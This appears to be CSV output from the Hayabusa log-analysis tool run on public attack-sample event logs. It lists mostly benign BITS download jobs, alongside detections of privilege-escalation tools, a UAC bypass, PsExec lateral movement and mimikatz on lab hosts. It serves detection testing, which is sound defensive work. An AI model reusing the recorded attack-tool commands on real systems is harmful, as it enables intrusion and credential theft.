+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe payload.dll : Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe : User: 3B\lgreen : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe : Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0) : Path: C:\Windows\System32\taskhostw.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe : Path: C:\Users\Public\psexecprivesc.exe : User: MSEDGEWIN10\user02 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 : Path: C:\Windows\System32\mspaint.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx -2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx -2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx -2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx -2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant 